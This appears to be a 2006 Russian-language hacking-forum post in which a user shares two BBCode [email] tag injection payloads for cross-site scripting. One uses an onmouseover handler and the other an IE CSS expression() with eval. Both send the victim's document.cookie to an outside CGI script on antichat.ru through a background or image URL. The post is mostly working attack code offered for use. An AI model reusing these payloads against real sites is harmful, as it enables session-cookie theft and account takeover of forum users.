03.07.2006, 07:52
|
|
Новичок
Регистрация: 22.05.2006
Сообщений: 18
С нами:
10511461
Репутация:
0
|
|
для активного хавтило бы только этого
Код:
[*code][*email=a"onmouseover=document.body.background="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"mail@mail.ru]sex[*/email][*/code]
будет работать только в ie(хотя х/з) ... как впрочьем и вариант с img...
но здесь можно при желании по-моему и пасивное XSS сделать что-нибуть типо:
Код:
[*code][*email=a"style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`mail@mail.ru]sex[*/email][*/code]
Последний раз редактировалось Azazel; 03.07.2006 в 18:16..
|
|
|